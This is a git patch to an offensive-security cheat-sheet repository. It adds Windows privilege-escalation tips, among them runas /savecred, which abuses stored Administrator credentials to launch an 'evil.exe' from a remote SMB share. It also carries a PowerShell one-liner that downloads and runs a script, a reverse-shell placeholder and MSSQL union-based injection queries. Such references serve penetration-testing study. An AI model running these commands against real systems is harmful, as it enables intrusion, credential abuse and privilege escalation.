From 4db45a263a2622bf3a2b08a32d7551b16a053cdc Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 20 Jan 2019 16:41:46 +0100 Subject: [PATCH] MSSQL union based + Windows Runas --- .../Windows - Privilege Escalation.md | 51 +++++++++++++------ SQL injection/MSSQL Injection.md | 24 +++++++++ SSRF injection/README.md | 3 +- Upload insecure files/PHP Extension/shell.php | 1 + 4 files changed, 62 insertions(+), 17 deletions(-) create mode 100644 Upload insecure files/PHP Extension/shell.php diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 6ae7f2f..7c70858 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -274,7 +274,7 @@ dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" ``` -## Using PowerSploit's PowerUp +## PowerSploit's PowerUp Spot the weak service using PowerSploit's PowerUp @@ -282,7 +282,7 @@ Spot the weak service using PowerSploit's PowerUp powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks ``` -## Using Windows Subsystem for Linux (WSL) +## Windows Subsystem for Linux (WSL) Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) @@ -295,6 +295,10 @@ wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` +Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` + +Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` + ## Unquoted Service Paths The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. @@ -310,26 +314,41 @@ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Whe List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) ##### #Security Bulletin   #KB     #Description    #Operating System -- [MS17-017](./MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) -- [CVE-2017-8464](./CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) -- [CVE-2017-0213](./CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) -- [CVE-2018-0833](./CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) -- [CVE-2018-8120](./CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) -- [MS17-010](./MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) -- [MS16-135](./MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) -- [MS16-111](./MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) -- [MS16-098](./MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) -- [MS16-075](./MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) -- [MS16-034](./MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) -- [MS16-032](./MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) -- [MS16-016](./MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) -- [MS16-014](./MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) +- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) +- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) +- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) +- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) +- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) +- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) +- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) +- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) +- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) +- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) +- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) +- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) +## Runas +Use the `cmdkey` to list the stored credentials on the machine. +```powershell +cmdkey /list +Currently stored credentials: + Target: Domain:interactive=WORKGROUP\Administrator + Type: Domain Password + User: WORKGROUP\Administrator +``` + +Then you can use `runas` with the `/savecred` options in order to use the saved credentials. +The following example is calling a remote binary via an SMB share. +```powershell +runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" +``` ## References diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index b71a95b..035f075 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -57,6 +57,30 @@ SELECT name, password_hash FROM master.sys.sql_logins SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` +## MSSQL Union Based + +```sql +-- extract databases names +$ SELECT name FROM master..sysdatabases +[*] Injection +[*] msdb +[*] tempdb + +-- extract tables from Injection database +$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' +[*] Profiles +[*] Roles +[*] Users + +-- extract columns for the table Users +$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users') +[*] UserId +[*] UserName + +-- Finally extract the data +$ SELECT UserId, UserName from Users +``` + ## MSSQL Error based ```sql diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 2675ec1..39c6228 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -1,7 +1,6 @@ # Server-Side Request Forgery Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. -![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png) ## Summary @@ -198,6 +197,8 @@ ssrf.php?url=http://127.0.0.1:80 ssrf.php?url=http://127.0.0.1:443 ``` +![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png) + The following URL scheme can be used to probe the network Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: diff --git a/Upload insecure files/PHP Extension/shell.php b/Upload insecure files/PHP Extension/shell.php new file mode 100644 index 0000000..b1abb37 --- /dev/null +++ b/Upload insecure files/PHP Extension/shell.php @@ -0,0 +1 @@ + \ No newline at end of file